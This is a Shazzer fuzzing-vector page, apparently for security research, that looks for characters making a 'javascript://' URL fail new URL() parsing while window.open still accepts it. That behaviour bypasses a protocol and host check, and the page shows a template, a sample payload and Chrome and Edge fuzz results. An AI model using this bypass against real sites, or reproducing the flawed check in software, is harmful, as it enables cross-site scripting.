Shazzer logo
Login

Url parsing diff b/w window.open and new URL

Edge logo 1
Chrome logo 1

Trying to bypass a check implemented like this try { parsedUrl = new URL(url) // do some checks protocol,host } catch(e){ // fine we can use it simply window.open(url) }

Created by: Sudistark

Created on: Friday, February 21, 2025 at 8:47:03 AM

Updated on: Wednesday, May 28, 2025 at 11:16:41 AM


Category: URL Handling

Vector visibility: Public

Vector type: JS

Vector charset: UTF-8

Template used:
char = String.fromCodePoint($[i],$[j])0x0D
url = "javascript://"+char+"google.com"0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
   pwn(url,char)0x0D
 }0x0D
0x0D
function pwn(url,char){0x0D
   try{0x0D
 window.open(url)0x0D
 console.log("shirley");0x0D
log($[i],$[j])0x0D
 }catch(e){0x0D
}0x0D
}
Your browser was detected as:
Detecting... Detecting... Detecting... Detecting...

Sample payloads

char = String.fromCodePoint(0,0)0x0D
url = "javascript://"+char+"google.com"0x0D
0x0D
try {0x0D
    new URL(url)0x0D
}0x0D
catch(e){0x0D
   pwn(url,char)0x0D
 }0x0D
0x0D
function pwn(url,char){0x0D
   try{0x0D
 window.open(url)0x0D
 console.alert("shirley");0x0D
alert(0,0)0x0D
 }catch(e){0x0D
}0x0D
}

Fuzz results

Chrome logo
Chrome 144.0.0.0 desktop Windows NT 10.0

Updated

Sun Jan 25 2026
Found 1 result
Loading...
Edge logo
Microsoft Edge 144.0.0.0 desktop Windows NT 10.0

Updated

Fri Jan 30 2026
Found 1 result
Loading...

Distributed Fuzzing

Enabled:
Status:disconnected
Your browser automatically contributes to distributed fuzzing when idle.